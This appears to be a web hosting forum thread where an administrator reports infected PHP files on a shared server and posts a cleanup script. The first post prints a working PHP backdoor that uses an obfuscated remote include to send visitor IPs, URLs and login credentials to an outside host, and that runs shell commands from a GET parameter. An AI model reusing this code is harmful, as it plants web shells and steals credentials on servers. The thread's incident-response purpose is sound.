Results 1 to 8 of 8
  1. #1
    Join Date
    Aug 2004
    Location
    Virginia Beach, VA
    Posts
    13

    New Vulnerabilities - Scary PHP Files ALL Over the Server

    Not sure if any of you may have fallen to the same issues yet, but I'd recommend you do a "locate" or find of some files...here's some examples:

    options.php
    layout.php
    configs.php
    base.php
    time.php
    date.php
    tests.php
    fsav.php

    There's plenty more out there. These files all contain some dirty code...here's an example:

    Code:
    <?php
    error_reporting(0);
    if(isset($_POST["l"]) and isset($_POST["p"])){
        if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
        else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
    }else{$user_auth="";}
    if(!isset($_POST["log_flg"])){$log_flg="&log";}
    if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_en
    code($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
    {
        if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
        if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
    }
    ?>
    Not sure exactly what this does, but...

    These files will INFEST your server. I have found them in almost EVERY user directory; meaning only safe_mode or suPHP could have stopped it. Cleaning them out is so difficult!

    I think this problem is related to Gallery. About 10 of my clients reported broken Gallery templates today and then this happened. However, Wordpress templates were also broken, and phpBBfm templates; they are broken on their own.

    It seems that the last two weeks has seen a HUGE jump in vulnerabilities...

    Anyone else seeing this? Any ideas? Please?

  2. #2
    Join Date
    Aug 2004
    Location
    Virginia Beach, VA
    Posts
    13
    Oh, and another thing...it also puts a .htaccess inside the directory with these phps that calls them on 404, which means you'll NEVER SEE IT in your apache logs.

  3. #3
    Join Date
    Aug 2004
    Location
    Virginia Beach, VA
    Posts
    13
    Here, I wrote this to try to these files quickly...

    The only thing they don't account for are directories with spaces in the name...

    Code:
    updatedb
    for problemfiles in time base date tests configs include guest report layout download remote create options messages package properties;
      do
        list=`locate $problemfiles.php | grep "\/$problemfiles.php" | grep -v hackers"`
        for i in $list;
          do     
             thecount=`grep base64_encode $i | wc -l`
             if [ $thecount -ne 0 ]; then
               mv $i $i.hackers
             fi
         done
      done
    Don't forget to do the updatedb first...and you must run this as root.

    If there's a better solution, great...this is the quickest I could come up with.

  4. #4
    Looks like a gallery exploit. Upgrade your galleries to the latest secure versions. Check out secunia.com for known vulnerabilities. Btw, you may try something like this to find exactly what it does.
    <?php
    print (base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9")
    ?>

  5. #5
    Join Date
    Aug 2004
    Location
    Virginia Beach, VA
    Posts
    13
    Yeah, I tried that, got back that it was contacting:

    http://bis.iframe.ru/master.php?r_addr=

    Unfortunately, a file_get_contents against it doesn't work. I think the server is down (or overloaded from success of the hack?)

  6. #6
    Are you using mod_security?
    Eleven2 Web Hosting - World-Wide Hosting, Done Right!

  7. #7
    Join Date
    Aug 2004
    Location
    Virginia Beach, VA
    Posts
    13
    Yes, I have mod_security loaded with every option I could find on the net except the IP blacklists (too much performance loss)

  8. #8
    Join Date
    Aug 2004
    Location
    Virginia Beach, VA
    Posts
    13
    Oops! Problem in the code...here's a working version.

    Code:
    updatedb
    for problemfiles in time base date tests configs include guest report layout download remote create options messages package properties;
      do
        list=`locate $problemfiles.php | grep "\/$problemfiles.php" | grep -v hackers`
        for i in $list;
          do     
             thecount=`grep base64_encode $i | wc -l`
             if [ $thecount -ne 0 ]; then
               mv $i $i.hackers
             fi
         done
      done

Related Posts from theWHIR.com

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •